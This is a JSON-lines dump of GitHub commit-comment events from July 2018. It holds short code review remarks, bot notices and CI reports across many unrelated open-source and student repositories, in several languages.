{"id":"7912025697","type":"CommitCommentEvent","actor":{"login":"vaish-rahul"},"repo":{"name":"SmartThingsCommunity/SmartThingsPublic"},"payload":{"comment":{"id":29579367,"position":5,"line":440,"path":"devicetypes/smartthings/zwave-lock.src/zwave-lock.groovy","commit_id":"a4180eb1f032567a6a74cb91e74fc5b24b073148","created_at":"2018-07-03T11:46:16Z","updated_at":"2018-07-03T11:46:16Z","author_association":"CONTRIBUTOR","body":"Same as the comment above."}},"created_at":"2018-07-03T11:46:16Z"}
{"id":"7912028259","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29579370,"position":null,"line":null,"path":null,"commit_id":"c78f276cc6a178ed324376df58b550cfcd3790a8","created_at":"2018-07-03T11:46:47Z","updated_at":"2018-07-03T11:46:47Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-26](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-26).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-26-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-03T11:46:47Z"}
{"id":"7912029906","type":"CommitCommentEvent","actor":{"login":"flontis"},"repo":{"name":"tuppp/mkp_read_data"},"payload":{"comment":{"id":29579374,"position":null,"line":null,"path":null,"commit_id":"8724ba281f4d6c29be1299c32523c49fea64be9b","created_at":"2018-07-03T11:47:10Z","updated_at":"2018-07-03T11:47:10Z","author_association":"CONTRIBUTOR","body":"@jacqueline26 @x5790 "}},"created_at":"2018-07-03T11:47:10Z"}
{"id":"7912029988","type":"CommitCommentEvent","actor":{"login":"aboletti"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29579375,"position":461,"line":561,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"04496f4c663dc1f77bf10fca6f340766700cc652","created_at":"2018-07-03T11:47:11Z","updated_at":"2018-07-03T11:47:11Z","author_association":"MEMBER","body":"Thanks, it has been fixed in the following commit"}},"created_at":"2018-07-03T11:47:11Z"}
{"id":"7912036255","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"rougier/freetype-py"},"payload":{"comment":{"id":29579393,"position":4,"line":62,"path":".travis.yml","commit_id":"a87127f0e9f139c663ebb3079cbfd73f62f72753","created_at":"2018-07-03T11:48:31Z","updated_at":"2018-07-03T11:48:31Z","author_association":"CONTRIBUTOR","body":"but you don't need to build one at every commit, only when `[ -n \"$TRAVIS_TAG\" ]`"}},"created_at":"2018-07-03T11:48:31Z"}
{"id":"7912043428","type":"CommitCommentEvent","actor":{"login":"theoldtree"},"repo":{"name":"theoldtree/project_euler"},"payload":{"comment":{"id":29579403,"position":null,"line":null,"path":null,"commit_id":"72ad0af8301419555c1e014367993e2562ab569e","created_at":"2018-07-03T11:50:01Z","updated_at":"2018-07-03T11:50:01Z","author_association":"OWNER","body":"new commit"}},"created_at":"2018-07-03T11:50:01Z"}
{"id":"7912044214","type":"CommitCommentEvent","actor":{"login":"kba"},"repo":{"name":"OCR-D/ocrd-train"},"payload":{"comment":{"id":29579407,"position":6,"line":6,"path":"Makefile","commit_id":"3836cf1719367fd2524820a18a65a5e4c2a19722","created_at":"2018-07-03T11:50:12Z","updated_at":"2018-07-03T11:50:12Z","author_association":"MEMBER","body":"`$HOME` is set by default (i.e. `HOME := $(HOME)`), if you want to override it you can, but I would not set a different default. As you use it, it seems more like you meant `PWD` or `REPO_ROOT`?"}},"created_at":"2018-07-03T11:50:12Z"}
{"id":"7912045719","type":"CommitCommentEvent","actor":{"login":"gx3541"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29579413,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T11:50:29Z","updated_at":"2018-07-03T11:50:29Z","author_association":"NONE","body":"仲有方法的\n\n2018-07-03 17:51 GMT+08:00, HKLCF <notifications@github.com>:\n> @renwokuang 對T_T\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/hklcf/myTV-api/commit/375fa7520455b53fad622c0149a473ebee048e15#commitcomment-29578111\n"}},"created_at":"2018-07-03T11:50:29Z"}
{"id":"7912049894","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29579431,"position":11,"line":11,"path":"NET.S.2018.Lavrenov.03/Task5/IntegerActions.cs","commit_id":"15663e459262c433fc58e5d8f17bfcb6991c363f","created_at":"2018-07-03T11:51:18Z","updated_at":"2018-07-03T11:51:18Z","author_association":"NONE","body":"Если в спецификации написано, что метод принимает положительно число, то, следовательно, отрицательное для него не является допустимым значением параметра, а здесь метод вернет -1, как ответ не найдено"}},"created_at":"2018-07-03T11:51:18Z"}
{"id":"7912052015","type":"CommitCommentEvent","actor":{"login":"urish"},"repo":{"name":"espruino/EspruinoDocs"},"payload":{"comment":{"id":29579437,"position":null,"line":null,"path":null,"commit_id":"ed1a05d02b7771aa0a92c9879c4f5e5ea0d764d2","created_at":"2018-07-03T11:51:44Z","updated_at":"2018-07-03T11:51:44Z","author_association":"CONTRIBUTOR","body":"👍"}},"created_at":"2018-07-03T11:51:44Z"}
{"id":"7912054464","type":"CommitCommentEvent","actor":{"login":"hippogamesunity"},"repo":{"name":"hippogamesunity/SimpleGif"},"payload":{"comment":{"id":29579446,"position":null,"line":null,"path":null,"commit_id":"c90b737cf1b70846ecc6fa06da53f41fc0872980","created_at":"2018-07-03T11:52:15Z","updated_at":"2018-07-03T11:52:15Z","author_association":"OWNER","body":"Hi! Why can't you use 1000x1000 image size?)"}},"created_at":"2018-07-03T11:52:15Z"}
{"id":"7912056048","type":"CommitCommentEvent","actor":{"login":"jsmeix"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":29579452,"position":14,"line":79,"path":"usr/share/rear/output/RAWDISK/Linux-i386/280_create_bootable_disk_image.sh","commit_id":"bcb0ed3e01d5e9225c6e243bb4971de90ea3c57b","created_at":"2018-07-03T11:52:34Z","updated_at":"2018-07-03T11:52:34Z","author_association":"CONTRIBUTOR","body":"@OliverO2 \r\nis there a special reason why the \"sleep\" method is tried before the \"kpartx\" method?\r\nI would expect the \"dumb sleep\" to be the last fallback when nothing better worked?"}},"created_at":"2018-07-03T11:52:34Z"}
{"id":"7912062335","type":"CommitCommentEvent","actor":{"login":"spacefrogg"},"repo":{"name":"timor/timor-overlay"},"payload":{"comment":{"id":29579473,"position":80,"line":82,"path":"default.nix","commit_id":"f5472c9634d89f4bfc6ab8ad3a9bf2fc401a61ef","created_at":"2018-07-03T11:53:53Z","updated_at":"2018-07-03T11:53:53Z","author_association":"CONTRIBUTOR","body":"The implementation of `buildEnv` shows, it does."}},"created_at":"2018-07-03T11:53:53Z"}
{"id":"7912070544","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29579493,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T11:55:34Z","updated_at":"2018-07-03T11:55:34Z","author_association":"CONTRIBUTOR","body":"@StefanMavrodiev , if our samples have TSOP48, I presume they are with NAND, otherwise the pads used for eMMCwould be BGA, right ?\r\n"}},"created_at":"2018-07-03T11:55:34Z"}
{"id":"7912074010","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29579501,"position":25,"line":25,"path":"cap2/2_5_2.sql","commit_id":"e8b22dc5365b39c49648bd1ff2d9f8c25315b5f6","created_at":"2018-07-03T11:56:17Z","updated_at":"2018-07-03T11:56:17Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\nとても細かい話ではありますが、穴埋めして完成するクエリではemployeeテーブルにはエイリアス付いていないです。"}},"created_at":"2018-07-03T11:56:17Z"}
{"id":"7912079055","type":"CommitCommentEvent","actor":{"login":"mhueni"},"repo":{"name":"power-coders/wp-powercoders-theme"},"payload":{"comment":{"id":29579507,"position":22,"line":14,"path":"index.php","commit_id":"8dadf0c34a97f742acb7f4b122f8d890b7a5703a","created_at":"2018-07-03T11:57:21Z","updated_at":"2018-07-03T11:57:21Z","author_association":"CONTRIBUTOR","body":"@memoibish \r\n\r\nyou are using an assignment inside the if(...) statement, this is no good style and I don't think you will get the intended behaviour if there is no thumbnail (or only by accident). also, an **if**-statement which does only contain code inside the **else** part is a very strange thing. please correct this:\r\n\r\n- use a compare operator (like \"==\" or \"!=\" or something similar) inside the if-statement\r\n- this means assigning a value to *$alt* **before** the **if**-statement\r\n- don't create empty blocks in if-statements (just switch the logic in the **if**, so you don't have to use **else**)"}},"created_at":"2018-07-03T11:57:21Z"}
{"id":"7912094088","type":"CommitCommentEvent","actor":{"login":"jsmeix"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":29579536,"position":11,"line":76,"path":"usr/share/rear/output/RAWDISK/Linux-i386/280_create_bootable_disk_image.sh","commit_id":"bcb0ed3e01d5e9225c6e243bb4971de90ea3c57b","created_at":"2018-07-03T12:00:29Z","updated_at":"2018-07-03T12:00:29Z","author_association":"CONTRIBUTOR","body":"@OliverO2 \r\nsee https://github.com/rear/rear/issues/793\r\nwhy one should not directly error out when a single `partprobe` call failed.\r\n\r\nI would suggest to replace this `Error` by `LogPrintError` to only inform\r\nthe user about that particular failure here and error out only at the end at\r\n<pre>\r\n# If unsuccessful, say so.\r\n[[ -b \"$boot_partition\" ]] || Error \"Cannot prepare boot file system for ...\"\r\n</pre>\r\nafter all methods had been tried and all had failed.\r\n"}},"created_at":"2018-07-03T12:00:29Z"}
{"id":"7912094174","type":"CommitCommentEvent","actor":{"login":"mhueni"},"repo":{"name":"power-coders/wp-powercoders-theme"},"payload":{"comment":{"id":29579537,"position":9,"line":7,"path":"index.php","commit_id":"8dadf0c34a97f742acb7f4b122f8d890b7a5703a","created_at":"2018-07-03T12:00:30Z","updated_at":"2018-07-03T12:00:30Z","author_association":"CONTRIBUTOR","body":"@memoibish \r\n\r\nthe **{** at the end of this line is not necessary. you already opened the block using **:** after the **while** statement and you close the block using **endwhile** (and the **}** is not necessary either). \r\n\r\nso it's either:\r\n\r\n` while(condition) { ...code in the loop... }`\r\n\r\nor\r\n\r\n`while(condition): ...code in the loop ... endwhile;\r\n\r\nplease correct this."}},"created_at":"2018-07-03T12:00:30Z"}
{"id":"7912096173","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29579545,"position":null,"line":null,"path":null,"commit_id":"f03adeef6a89ce5f5276512f9a4fe827869327ce","created_at":"2018-07-03T12:00:53Z","updated_at":"2018-07-03T12:00:53Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-28](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-28).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-28-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-03T12:00:53Z"}
{"id":"7912100587","type":"CommitCommentEvent","actor":{"login":"mhueni"},"repo":{"name":"power-coders/wp-powercoders-theme"},"payload":{"comment":{"id":29579554,"position":33,"line":23,"path":"index.php","commit_id":"8dadf0c34a97f742acb7f4b122f8d890b7a5703a","created_at":"2018-07-03T12:01:48Z","updated_at":"2018-07-03T12:01:48Z","author_association":"CONTRIBUTOR","body":"@memoibish \r\n\r\nhere you can remove the **echo** since **the_title()** already echoes it (but **get_the_title()** won't echo)"}},"created_at":"2018-07-03T12:01:48Z"}
{"id":"7912102736","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29579560,"position":14,"line":206,"path":"addons/mrp/models/stock_move.py","commit_id":"c825bbcd6f88b23bcb07cd1aa008047af8e67e59","created_at":"2018-07-03T12:02:14Z","updated_at":"2018-07-03T12:02:14Z","author_association":"NONE","body":"else ; procure_mthod 'make_to_stock'"}},"created_at":"2018-07-03T12:02:14Z"}
{"id":"7912103452","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29579562,"position":9,"line":201,"path":"addons/mrp/models/stock_move.py","commit_id":"c825bbcd6f88b23bcb07cd1aa008047af8e67e59","created_at":"2018-07-03T12:02:23Z","updated_at":"2018-07-03T12:02:23Z","author_association":"NONE","body":"except UserError"}},"created_at":"2018-07-03T12:02:23Z"}
{"id":"7912104128","type":"CommitCommentEvent","actor":{"login":"fallinbryan"},"repo":{"name":"fallinbryan/FNA"},"payload":{"comment":{"id":29579564,"position":6,"line":37,"path":"FiberNetworkAuditor/NECreateGroupBox.cs","commit_id":"370d8c2e1d54f7791ed61b849426c82553871cd8","created_at":"2018-07-03T12:02:32Z","updated_at":"2018-07-03T12:02:32Z","author_association":"OWNER","body":"resolves #15 "}},"created_at":"2018-07-03T12:02:32Z"}
{"id":"7912104431","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29579565,"position":115,"line":315,"path":"sys/kern/kern_ubsan.c","commit_id":"409ac5341e62b01eb6e0bba9a56eece00a5daa94","created_at":"2018-07-03T12:02:36Z","updated_at":"2018-07-03T12:02:36Z","author_association":"COLLABORATOR","body":"`space for`"}},"created_at":"2018-07-03T12:02:36Z"}
{"id":"7912105409","type":"CommitCommentEvent","actor":{"login":"spelle"},"repo":{"name":"spelle/obfuscator"},"payload":{"comment":{"id":29579571,"position":null,"line":null,"path":null,"commit_id":"571624df82aaa4a3a3571e30db2dd231047c6e32","created_at":"2018-07-03T12:02:49Z","updated_at":"2018-07-03T12:02:49Z","author_association":"OWNER","body":"Hi Tomasz,\r\nI made some changes in the string obfuscation. It now obfuscate only the strings that only have printable characters or whitespaces.\r\n\r\nI have been able to run the obfuscator on your \"singlefile\" sample without a crash.\r\n\r\nHowever, I abserve that not all the strings are obfuscated. And when in \"Release\" mode, less strings are obfuscated : \r\n- With a simple `hello_world` program, the string `Hello World !` is encrypted when no optimization is required, However when asking for a -O2 or -O3, the string si no more encrypted.\r\n\r\nIf you want to look a it, changes are made on the llvm-6.0.0 branch\r\n\r\nI continue looking at it."}},"created_at":"2018-07-03T12:02:49Z"}
{"id":"7912106375","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29579572,"position":14,"line":27,"path":"sys/kern/kern_ubsan.c","commit_id":"409ac5341e62b01eb6e0bba9a56eece00a5daa94","created_at":"2018-07-03T12:03:00Z","updated_at":"2018-07-03T12:03:00Z","author_association":"COLLABORATOR","body":"2 abandoned most likely as not needed for NetBSD"}},"created_at":"2018-07-03T12:03:00Z"}
{"id":"7912109646","type":"CommitCommentEvent","actor":{"login":"StefanMavrodiev"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29579581,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T12:03:42Z","updated_at":"2018-07-03T12:03:42Z","author_association":"CONTRIBUTOR","body":"@martinayotte Yes. But again, we've never produced a single board with NAND flash."}},"created_at":"2018-07-03T12:03:42Z"}
{"id":"7912109701","type":"CommitCommentEvent","actor":{"login":"simonschmeisser"},"repo":{"name":"isys-vision/rviz_visual_tools"},"payload":{"comment":{"id":29579582,"position":null,"line":null,"path":null,"commit_id":"65835849130b49562db53ea5da63a2ae51c6180f","created_at":"2018-07-03T12:03:43Z","updated_at":"2018-07-03T12:03:43Z","author_association":"NONE","body":"@davetcoleman this should be included in melodic? Note also that it requires at least cmake version 2.8.6 for automoc to exist"}},"created_at":"2018-07-03T12:03:43Z"}
{"id":"7912112557","type":"CommitCommentEvent","actor":{"login":"idreestahir"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29579588,"position":15,"line":33,"path":"webclient/src/main/resources/static/js/status/Status.js","commit_id":"bd6fe93b2b50c8a9702f6bc97642ada037446bfc","created_at":"2018-07-03T12:04:19Z","updated_at":"2018-07-03T12:04:19Z","author_association":"COLLABORATOR","body":"On some help forms, it was recommended to avoid replacing those single quotes with double when there is some internal attribute using double quotes. So i didn't took risk unless its confirm."}},"created_at":"2018-07-03T12:04:19Z"}
{"id":"7912114662","type":"CommitCommentEvent","actor":{"login":"braathwaate"},"repo":{"name":"braathwaate/frontac24"},"payload":{"comment":{"id":29579592,"position":4,"line":5737,"path":"core/reporting/includes/tcpdf.php","commit_id":"9dca888afe9423ed38cf28a8ef93ffb1cf0d5184","created_at":"2018-07-03T12:04:46Z","updated_at":"2018-07-03T12:04:46Z","author_association":"OWNER","body":"Yes, this change is not the right way to fix the code, but was done this way for illustrative purpose.    The old code called html_entity_decode_php4() for \"unicode\" and html_entity_decode() for non-unicode.   UTF-8 is unicode, so it called html_entity_decode_php4(), and that caused the problem, so the simple fix in my case was just to always call html_entity_decode() .\r\n\r\nBut I have no idea why my code \"fix\" works.  Perhaps it works just most of the time because English utf-8 is basically single-byte, but there are some cases (untested) that use another byte that would fail?\r\n\r\nAnd I do not know if others experience this same problem.  Clearly, those using the default FA ISO character set are not (i.e. the demo site works correctly), but if they use a multi-byte character set, perhaps they would see this problem?"}},"created_at":"2018-07-03T12:04:46Z"}
{"id":"7912115457","type":"CommitCommentEvent","actor":{"login":"tamerawwad"},"repo":{"name":"huruifeng/lncRNATarget_local"},"payload":{"comment":{"id":29579593,"position":null,"line":null,"path":null,"commit_id":"7a1287ada45b2fd5b04a46323d6da6542c814c9f","created_at":"2018-07-03T12:04:56Z","updated_at":"2018-07-03T12:04:56Z","author_association":"NONE","body":"Hi, \r\nwhen I applied your command it gave me an error message:\r\nFile \"/Users/tamer/Desktop/lncRNATarget_local-master/rnatarget.py\", line 131\r\n    print percent\r\n                ^\r\nSyntaxError: Missing parentheses in call to 'print'. Did you mean print(print percent)?"}},"created_at":"2018-07-03T12:04:56Z"}
{"id":"7912124874","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29579612,"position":null,"line":null,"path":null,"commit_id":"f749e9415d87aa8cd78209a898adfa0e3b59a64a","created_at":"2018-07-03T12:06:52Z","updated_at":"2018-07-03T12:06:52Z","author_association":"COLLABORATOR","body":"Puzzle `1119-cdea2c77` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/cost/funding/send_zold.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/cost/funding/send_zold.groovy)   and submitted as #1325. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-03T12:06:52Z"}
{"id":"7912125028","type":"CommitCommentEvent","actor":{"login":"luserx0"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29579613,"position":115,"line":315,"path":"sys/kern/kern_ubsan.c","commit_id":"409ac5341e62b01eb6e0bba9a56eece00a5daa94","created_at":"2018-07-03T12:06:54Z","updated_at":"2018-07-03T12:06:54Z","author_association":"OWNER","body":"Corrected"}},"created_at":"2018-07-03T12:06:54Z"}
{"id":"7912128057","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.testing"},"payload":{"comment":{"id":29579618,"position":null,"line":null,"path":null,"commit_id":"d1f92d8699370bacfddd1d6621c9722d2955b8ec","created_at":"2018-07-03T12:07:30Z","updated_at":"2018-07-03T12:07:30Z","author_association":"NONE","body":"@gforcada Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.testing/88/violations\n```\nsrc/plone/testing/z2.py:98:1: C901 'uninstallProduct' is too complex (15)\nsrc/plone/testing/z2.py:138:19: T000 Todo note found.\nsrc/plone/testing/z2.py:414:5: C901 'Startup.setUpPatches' is too complex (11)\nsrc/plone/testing/z2.py:829:11: T000 Todo note found.\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-03T12:07:30Z"}
{"id":"7912131561","type":"CommitCommentEvent","actor":{"login":"jco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29579626,"position":14,"line":206,"path":"addons/mrp/models/stock_move.py","commit_id":"c825bbcd6f88b23bcb07cd1aa008047af8e67e59","created_at":"2018-07-03T12:08:16Z","updated_at":"2018-07-03T12:08:16Z","author_association":"NONE","body":"change of behaviour in stable"}},"created_at":"2018-07-03T12:08:16Z"}
{"id":"7912133325","type":"CommitCommentEvent","actor":{"login":"davidhm"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":29579629,"position":11,"line":11,"path":"src/broadcast/networkrequest.h","commit_id":"ba8a6fc86555f743c9280dbecb485576c9fa57ec","created_at":"2018-07-03T12:08:37Z","updated_at":"2018-07-03T12:08:37Z","author_association":"NONE","body":"Done."}},"created_at":"2018-07-03T12:08:37Z"}
{"id":"7912138314","type":"CommitCommentEvent","actor":{"login":"jers49"},"repo":{"name":"jers49/SiemLogicLibrary"},"payload":{"comment":{"id":29579643,"position":null,"line":null,"path":null,"commit_id":"1dca877925524675226e86c87351f29cf0590c42","created_at":"2018-07-03T12:09:40Z","updated_at":"2018-07-03T12:09:40Z","author_association":"OWNER","body":"Updated version"}},"created_at":"2018-07-03T12:09:40Z"}
{"id":"7912139903","type":"CommitCommentEvent","actor":{"login":"AndyK70"},"repo":{"name":"Courseplay/courseplay"},"payload":{"comment":{"id":29579646,"position":null,"line":null,"path":null,"commit_id":"69c7b88a3934ee3b9a46b0b414d1ce087b4e9506","created_at":"2018-07-03T12:10:00Z","updated_at":"2018-07-03T12:10:00Z","author_association":"NONE","body":"Nothing special until now, only the shovel positions by key event which is in my pull request but I like to keep it updated to see, if my changes would run into merge issues.\r\nWhen I saw version 5.03.0005 here I was wondering because on my latest pull (to integrate actual development into my branch) I didn't see any version tags. Then I double and even triple checked if I was missing something.\r\n\r\nMy main work I do is on my personal extended GPS version original by upsidedown. Unfortunately he didn't granted anyone to take over GPS officially and he is not going to add or even to integrate new/extended stuff. Imho I think he is completely busy with Cattle&Crops. \r\nWithout his consent I won't make any marketing for my work on extending his GPS (which btw still is WIP and not stable) nor will I publish it (actively). On the other hand I can't make that project private only because I only have a free GitHub account which lacks that possibility.\r\n\r\nOne thing I already thought on was having a look in mode10 to check for work to be done or not and in the latter case make the vehicle go on parking position and shut down the engine. Then only check for work and reactivate vehicle if there is some. I'm using mode10 for my active savegame so if current status bothers me too much I probably will pause my GPS project and will look into mode10... 🤷‍♂"}},"created_at":"2018-07-03T12:10:00Z"}
{"id":"7912142651","type":"CommitCommentEvent","actor":{"login":"luserx0"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29579657,"position":21,"line":38,"path":"sys/kern/kern_ubsan.c","commit_id":"ccfa3f4b2e4ad40b2712fed54f03e6cf7c035947","created_at":"2018-07-03T12:10:33Z","updated_at":"2018-07-03T12:10:33Z","author_association":"OWNER","body":"Setting it as a goal"}},"created_at":"2018-07-03T12:10:33Z"}
{"id":"7912145185","type":"CommitCommentEvent","actor":{"login":"Aloki"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29579663,"position":null,"line":null,"path":null,"commit_id":"ec09a23d3dea29cba11c755d30c648a2c5d06488","created_at":"2018-07-03T12:11:05Z","updated_at":"2018-07-03T12:11:05Z","author_association":"NONE","body":"Тогда нужно доработать функцию logdirscreate скрипта miner. В настоящий момент, поскольку /var/log смонтирован в RAM, после перезагрузки фермы создаются только каталоги, указанные в массиве miners_avail, и тот же каталог /var/log/miner/mysuperminer из примера создан не будет, соответственно и лога /var/log/miner/mysuperminer/somelogname.log не будет."}},"created_at":"2018-07-03T12:11:05Z"}
{"id":"7912146091","type":"CommitCommentEvent","actor":{"login":"jmtroth0"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29579664,"position":43,"line":319,"path":"corehq/apps/couch_sql_migration/couchsqlmigration.py","commit_id":"0bbd4418471a06c8f4937d3162827718e376f822","created_at":"2018-07-03T12:11:15Z","updated_at":"2018-07-03T12:11:15Z","author_association":"CONTRIBUTOR","body":"@dannyroberts `NORMALIZED` was my perhaps too simple attempt to trying to figure out the timing _per_ form or case rather than of an entire section, i.e. normalized by object.\r\n\r\nI also adjusted them at some point to get more info, and different metrics may somewhat require different granularity. https://github.com/dimagi/commcare-hq/commit/a9d69e6395fe77dff630c09c31b4c4d15c48ef50"}},"created_at":"2018-07-03T12:11:15Z"}
{"id":"7912150610","type":"CommitCommentEvent","actor":{"login":"minershive"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29579673,"position":null,"line":null,"path":null,"commit_id":"ec09a23d3dea29cba11c755d30c648a2c5d06488","created_at":"2018-07-03T12:12:11Z","updated_at":"2018-07-03T12:12:11Z","author_association":"OWNER","body":"все верно. этим занимается h-run.sh\r\nсейчас выложим первый пример с tdxminer и все будет понятней"}},"created_at":"2018-07-03T12:12:11Z"}
{"id":"7912152310","type":"CommitCommentEvent","actor":{"login":"BearGS"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29579676,"position":10,"line":13,"path":"packages/react/src/ReactBaseClasses.js","commit_id":"b1b3acbd6b5fad40558db790f59855116ec3ee93","created_at":"2018-07-03T12:12:31Z","updated_at":"2018-07-03T12:12:31Z","author_association":"NONE","body":"why change to inline emptyObject?"}},"created_at":"2018-07-03T12:12:31Z"}
{"id":"7912153152","type":"CommitCommentEvent","actor":{"login":"aboletti"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29579678,"position":1525,"line":1169,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"3caf1135058b17d28ad6fc81a1d22afdf20f7b45","created_at":"2018-07-03T12:12:41Z","updated_at":"2018-07-03T12:12:41Z","author_association":"MEMBER","body":"@anigamova \r\nwhat is the benefit in having this function defined as integer?\r\nDefining it as a float would allow avoiding the truncation step performed in the final line, and filling histograms with weights can be done with not-integer values as well. Is there any minus I am not considering?"}},"created_at":"2018-07-03T12:12:41Z"}
{"id":"7912153956","type":"CommitCommentEvent","actor":{"login":"elpiankova"},"repo":{"name":"Polinq/InfopulsePolina"},"payload":{"comment":{"id":29579679,"position":3,"line":3,"path":"Homework_4_Task_2.py","commit_id":"a4ef9922275a62f33aa68d07fabf37674e01578b","created_at":"2018-07-03T12:12:50Z","updated_at":"2018-07-03T12:12:50Z","author_association":"NONE","body":"@Polinq Полина, ты просто выводишь значение на 1 меньше максимума. А я тут имела в виду второе по убыванию. Т.е. следующее самое большое, не считая самого максимума."}},"created_at":"2018-07-03T12:12:50Z"}
{"id":"7912157144","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29579690,"position":4,"line":26,"path":"repos/os/src/server/vfs/main.cc","commit_id":"ae07c55d6b9ae6ac26dec180925e117ff738bc00","created_at":"2018-07-03T12:13:28Z","updated_at":"2018-07-03T12:13:28Z","author_association":"NONE","body":"Why is this header needed?"}},"created_at":"2018-07-03T12:13:28Z"}
{"id":"7912157248","type":"CommitCommentEvent","actor":{"login":"shanghai26"},"repo":{"name":"shanghai26/LeetCodeSolution"},"payload":{"comment":{"id":29579691,"position":null,"line":null,"path":null,"commit_id":"6127a163f88cd7e499b64f94466d862d3afe7525","created_at":"2018-07-03T12:13:29Z","updated_at":"2018-07-03T12:13:29Z","author_association":"OWNER","body":"merge to origin/master"}},"created_at":"2018-07-03T12:13:29Z"}
{"id":"7912158174","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29579695,"position":8,"line":8,"path":"e08/e08_04/e08_04.py","commit_id":"9bfc63ed61055d92a900e1e2f7fb0b3bec41b450","created_at":"2018-07-03T12:13:41Z","updated_at":"2018-07-03T12:13:41Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\n読み込むファイルの拡張子が抜けています。漏れなく意識しましょう"}},"created_at":"2018-07-03T12:13:41Z"}
{"id":"7912158574","type":"CommitCommentEvent","actor":{"login":"Aloki"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29579696,"position":null,"line":null,"path":null,"commit_id":"ec09a23d3dea29cba11c755d30c648a2c5d06488","created_at":"2018-07-03T12:13:45Z","updated_at":"2018-07-03T12:13:45Z","author_association":"NONE","body":"Упс, как-то не догадался. Спасибо за подсказку. :)"}},"created_at":"2018-07-03T12:13:45Z"}
{"id":"7912158621","type":"CommitCommentEvent","actor":{"login":"gaearon"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29579697,"position":10,"line":13,"path":"packages/react/src/ReactBaseClasses.js","commit_id":"b1b3acbd6b5fad40558db790f59855116ec3ee93","created_at":"2018-07-03T12:13:46Z","updated_at":"2018-07-03T12:13:46Z","author_association":"MEMBER","body":"Because we're removing the fbjs dependency."}},"created_at":"2018-07-03T12:13:46Z"}
